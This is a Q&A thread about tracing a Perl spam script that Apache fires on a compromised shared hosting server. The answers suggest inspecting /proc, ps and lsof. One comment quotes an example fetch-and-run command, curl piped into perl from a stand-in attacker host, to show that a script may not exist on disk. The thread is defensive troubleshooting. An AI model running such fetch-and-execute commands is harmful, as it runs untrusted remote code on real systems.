# Find perl executing script/path

Tags: linux, perl, email, spam

I have a WHM server running Centos 4 (yes I know it just turned unsupported) all updates are installed, everything seems up to date.
In Dec 2011 one of the server owners, who has like 50 websites on it, got his computer infected and the virus/trojan read his FTP saved passwords then logged in by ftp and modified ALL index.php files it could find, we though we cleared all.

The problem is the following, they're somehow sending e-mails using a perl script fired by Apache I need a way to find out which is the path of the script they're firing, in "ps" it only shows as "perl", when checking the files opened by the perl script it lists ALL apache vhost logs, apache error log and /dev/null.

I NEED a way to find out the path of the script that's sending the e-mails, the server got listed into CBL at spamhaus twice by now, searching "by hand" it's not an option as there are over 200 websites there that take over 100GB of space on the server.

Server it is NOT compromised, the only problem is that I can't find the script that sends the spam.

Comment: As harsh as it may sound your best option will likely be to wipe the box and restore from a known good backup. If you do not have a known good backup than you will probably be best served by building a new server and vetting all files before moving them over. If your hacker was even minimally competent you might never root out all the changes made to your system.

Comment: The script is not necessarily a local plaintext file. `decrypt warez.xxx | perl` or `curl http://hackerzlair.ca/spmmurz.pl | perl`, for example, are ways of starting a perl script on your system.

Answer (score 4, accepted):

You can try and figure it out from the /proc directory

Grab the PID of the running perl process, then check

/proc/PID/cwd which will be a symlink to the current working directory of the script

check

/proc/PID/cmdline which will contain the full command line of the running process

(in both those cases replace PID with the pid of the process)

Disclaimer: I'm working off my linux machine, so it is entirely possible that your file system layout is different

Answer (score 1):

On most unix systems ps just shows the command name but

```
ps -ef
```

Will show the full path.  Ps'es differ from unix to unix.  If this doesn't work try

```
man ps
```

and look for "full" or "full format".  Hope this helps.

Answer (score 0):

[ps](http://unixhelp.ed.ac.uk/CGI/man-cgi?ps) often has a `-f` flag or something similar that will show you the full set of information. If that doesn't work, try using [lsof](http://www.manpagez.com/man/8/lsof/) for the process number you get from the ps command.